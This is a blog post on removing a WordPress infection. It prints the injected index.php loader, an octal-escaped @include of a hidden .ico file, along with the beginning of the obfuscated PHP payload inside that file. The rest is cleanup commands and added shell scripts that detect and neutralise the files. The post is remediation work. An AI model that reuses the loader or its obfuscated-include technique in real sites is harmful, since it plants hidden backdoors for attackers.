How to fix malware planted in WordPress through .ico files


Symptoms in WordPress

An index.php file appears in several directories for no apparent reason, with the following content:

<?php
/*5155f*/

@include "\057da\164a/\167ww\162oo\164/w\145b/\167ww\056fu\156et\070.c\157m/\167p-\143on\164en\164/f\151le\163/.\0632e\06691\0609.\151co";

/*5155f*/

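After deleting the files, they reappear a few days later. This should be caused by a WordPress vulnerability; I don't know whether it is a plugin vulnerability or a vulnerability in WordPress itself.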
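What the escaped string in the injected index.php points at, as an added example that is not part of the original post: the script expands the octal escapes and lists every PHP file under a directory that includes such a path. The function names are made up for this example, and only octal (\NNN) escapes are handled.

```shell
#!/bin/sh
# Added example, not from the original post.

# String literal copied from the injected index.php shown above.
SAMPLE='\057da\164a/\167ww\162oo\164/w\145b/\167ww\056fu\156et\070.c\157m/\167p-\143on\164en\164/f\151le\163/.\0632e\06691\0609.\151co'

# decode_php_escapes STRING: expand PHP octal escapes (\NNN); other text is unchanged.
decode_php_escapes() {
    # printf %b expects octal as \0NNN, so rewrite \NNN to \0NNN first.
    printf '%b' "$(printf '%s' "$1" | sed -E 's/\\([0-7]{1,3})/\\0\1/g')"
}

# scan_loaders ROOT: list PHP files that include/require an octal-escaped path,
# one per line as "file<TAB>decoded target".
scan_loaders() {
    pat='(include|require)(_once)?[[:space:]]*\(?[[:space:]]*"([^"]*\\[0-7]{1,3}[^"]*)"'
    grep -rlE --include='*.php' "$pat" "$1" 2>/dev/null |
    while IFS= read -r f; do
        # Group 3 of the pattern is the raw string literal between the quotes.
        raw=$(sed -nE "s/.*$pat.*/\\3/p" "$f" | head -n 1)
        printf '%s\t%s\n' "$f" "$(decode_php_escapes "$raw")"
    done
}

# With a directory argument, scan it; without one, decode the sample from the page.
if [ "$#" -gt 0 ]; then
    scan_loaders "$1"
else
    decode_php_escapes "$SAMPLE"; echo
fi
```

The decoded target is the hidden .ico file that the `find` command further down locates.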


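Deleted files come back again like cockroaches. Instead, change the file permissions: find the infected files and set their permissions to read-only (400).

My server runs CentOS 7.

Enter the WordPress directory
Directory: site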
echo ""> ./site/index.php
echo ""> ./site/page.php
chmod 400 -R ./site

The img directory contains static files:
# find ./img/ -name 'index.php'
# cat ./img/tui15-01-12/index.php
<?php
/*5155f*/

@include "\057da\164a/\167ww\162oo\164/w\145b/\167ww\056fu\156et\070.c\157m/\167p-\143on\164en\164/f\151le\163/.\0632e\06691\0609.\151co";

/*5155f*/

# echo "hello world"> ./img/*/index.php
-bash: ./img/*/index.php: ambiguous redirect
Blank out the files:
echo "" > ./img/10baofu/index.php
echo "" > ./img/13apple/index.php
echo "" > ./img/2014/index.php
echo "" > ./img/2015ali-fj/index.php
echo "" > ./img/2015nba-jiezhi/index.php
echo "" > ./img/bf-low/index.php
echo "" > ./img/caipiao/index.php
echo "" > ./img/canren-gif/index.php
echo "" > ./img/china-dxjc/index.php
echo "" > ./img/china-viwe/index.php
echo "" > ./img/chuangyetaolu/index.php
echo "" > ./img/clonezilla-centos/index.php
echo "" > ./img/code-yuyan/index.php
echo "" > ./img/dakai-nao/index.php
echo "" > ./img/deguo-read/index.php
echo "" > ./img/egao-cxy/index.php
echo "" > ./img/guanlan/index.php
echo "" > ./img/HTTP_Status_Code/index.php
echo "" > ./img/jaychow-zhuanji/index.php
echo "" > ./img/jenkins/index.php
echo "" > ./img/kubisbz/gpjifxbt.php
echo "" > ./img/kubisbz/index.php
echo "" > ./img/linux/index.php
echo "" > ./img/nainai-dd/index.php
echo "" > ./img/ndong-gif/index.php
echo "" > ./img/qingzi-love/index.php
echo "" > ./img/qq-ali-work/index.php
echo "" > ./img/R720_system/index.php
echo "" > ./img/tiaoyuepic/index.php
echo "" > ./img/toulanzs/index.php
echo "" > ./img/tui14-10-26b/index.php
echo "" > ./img/tui15-01-12/index.php
echo "" > ./img/tui15-04-12/index.php
echo "" > ./img/vpn_windows/index.php
echo "" > ./img/weixin_bps/index.php
echo "" > ./img/xidada-gif/index.php
echo "" > ./img/xiee-logo/index.php
echo "" > ./img/yamaxun-gif/index.php
echo "" > ./img/yunweioneday/index.php
echo "" > ./img/zhexieci/index.php
echo "" > ./img/zhuangbi-men/index.php
Change the file permissions:
chmod 400 ./img/10baofu/index.php
chmod 400 ./img/13apple/index.php
chmod 400 ./img/2014/index.php
chmod 400 ./img/2015ali-fj/index.php
chmod 400 ./img/2015nba-jiezhi/index.php
chmod 400 ./img/bf-low/index.php
chmod 400 ./img/caipiao/index.php
chmod 400 ./img/canren-gif/index.php
chmod 400 ./img/china-dxjc/index.php
chmod 400 ./img/china-viwe/index.php
chmod 400 ./img/chuangyetaolu/index.php
chmod 400 ./img/clonezilla-centos/index.php
chmod 400 ./img/code-yuyan/index.php
chmod 400 ./img/dakai-nao/index.php
chmod 400 ./img/deguo-read/index.php
chmod 400 ./img/egao-cxy/index.php
chmod 400 ./img/guanlan/index.php
chmod 400 ./img/HTTP_Status_Code/index.php
chmod 400 ./img/jaychow-zhuanji/index.php
chmod 400 ./img/jenkins/index.php
chmod 400 ./img/kubisbz/gpjifxbt.php
chmod 400 ./img/kubisbz/index.php
chmod 400 ./img/linux/index.php
chmod 400 ./img/nainai-dd/index.php
chmod 400 ./img/ndong-gif/index.php
chmod 400 ./img/qingzi-love/index.php
chmod 400 ./img/qq-ali-work/index.php
chmod 400 ./img/R720_system/index.php
chmod 400 ./img/tiaoyuepic/index.php
chmod 400 ./img/toulanzs/index.php
chmod 400 ./img/tui14-10-26b/index.php
chmod 400 ./img/tui15-01-12/index.php
chmod 400 ./img/tui15-04-12/index.php
chmod 400 ./img/vpn_windows/index.php
chmod 400 ./img/weixin_bps/index.php
chmod 400 ./img/xidada-gif/index.php
chmod 400 ./img/xiee-logo/index.php
chmod 400 ./img/yamaxun-gif/index.php
chmod 400 ./img/yunweioneday/index.php
chmod 400 ./img/zhexieci/index.php
chmod 400 ./img/zhuangbi-men/index.php
# find ./  -name ".*.ico"
./wp-content/files/.32e69109.ico

cat ./wp-content/files/.32e69109.ico
<?php
$_no41yhg = basename/*m8k*/(/*z9c*/trim/*mc*/(/*s*/preg_replace/*50*/(/*x2f*/rawurldecode/*st2*/(/*qa7*/"%2F%5C%28.%2A%24%2F"/*458ix*/)/*x1lbe*/, '', __FILE__/*ac*/)/*bu*//*knaq2*/)/*di*//*u6*/)/*fd1uc*/;$_b4iwx = "GU%12M%17%5DTVP%40%0C%07G%09%40F%17SX%5CoZA%07%17%0AVGm%06D%5CPD%5C%0ENJF%24H8%01S_X%5E%5C%06N%10%1B%5CVS%08iZ%5E%5EMK%11%170MAW%04B%5C%11%17%15%0EXJT%24s%5B%0B_fBUM%06N%06%1D%5C%5C%40%3AZVV%17%15%0E%276%23b%1A%09%25_WXoJK%1DKHB%5CU%3ASKC_K%5DNOO%1E%1A%09%25_WXoJK%1DKHCRJ%3ASATSLZ%00%0C%01qG%5B%08S%1E%1D%10%09%07R%23%0A%5CA%5D%17iKT%40V%5C%1D%0A%01I%1B%02L%0DyBUMq%1D%0A%02Kl%5E%0C%5BPE%18%09%07R%0A%09%06%12V%00PP_U%5D%06K3%27~lw%2Az%1B%18%19BJ%0C%05%06%40V%1AGfqao%7Ca%25AC%0E%11n%0B%14%10%0AMPHIKNJVT%0CX%5CU%18%1EH%00%0F%0AqCG%11iZ%5E%5EMK%07%17%1C%0E%14%1BLM% ....

# echo "">./wp-content/files/.32e69109.ico
# chmod 400 ./wp-content/files/.32e69109.ico
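The blank-and-lock steps above done in one pass, as an added example that is not part of the original post. A redirect accepts exactly one target, which is why `> ./img/*/index.php` fails with "ambiguous redirect", so the loop handles one file per iteration and only touches PHP files that match the loader pattern or hidden .ico files that start with `<?php`. The function names are made up for this example.

```shell
#!/bin/sh
# Added example, not from the original post.

# is_loader FILE: true if FILE includes/requires a string containing octal escapes.
is_loader() {
    grep -qE '(include|require)(_once)?[[:space:]]*\(?[[:space:]]*"[^"]*\\[0-7]{1,3}' "$1"
}

# is_disguised_php FILE: true if FILE starts with a PHP open tag.
is_disguised_php() {
    head -c 5 "$1" | grep -q '^<?php'
}

# neutralize ROOT: truncate and lock every matching file; prints each path handled.
neutralize() {
    find "$1" -type f \( -name '*.php' -o -name '.*.ico' \) -print |
    while IFS= read -r f; do
        case "$f" in
            *.php) is_loader "$f" || continue ;;        # leave legitimate PHP alone
            *)     is_disguised_php "$f" || continue ;; # leave real icons alone
        esac
        chmod u+w "$f"   # in case an earlier pass already set it read-only
        : > "$f"         # one redirect target per iteration
        chmod 400 "$f"
        printf '%s\n' "$f"
    done
}

# Run against a directory only when one is given on the command line.
if [ "$#" -gt 0 ]; then
    neutralize "$1"
fi
```

Mode 400 only holds against a process that does not own the file; if PHP runs as the file owner, it can chmod the file back.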

Reproduction without permission is prohibited: 好玩吧 » How to fix malware planted in WordPress through .ico files
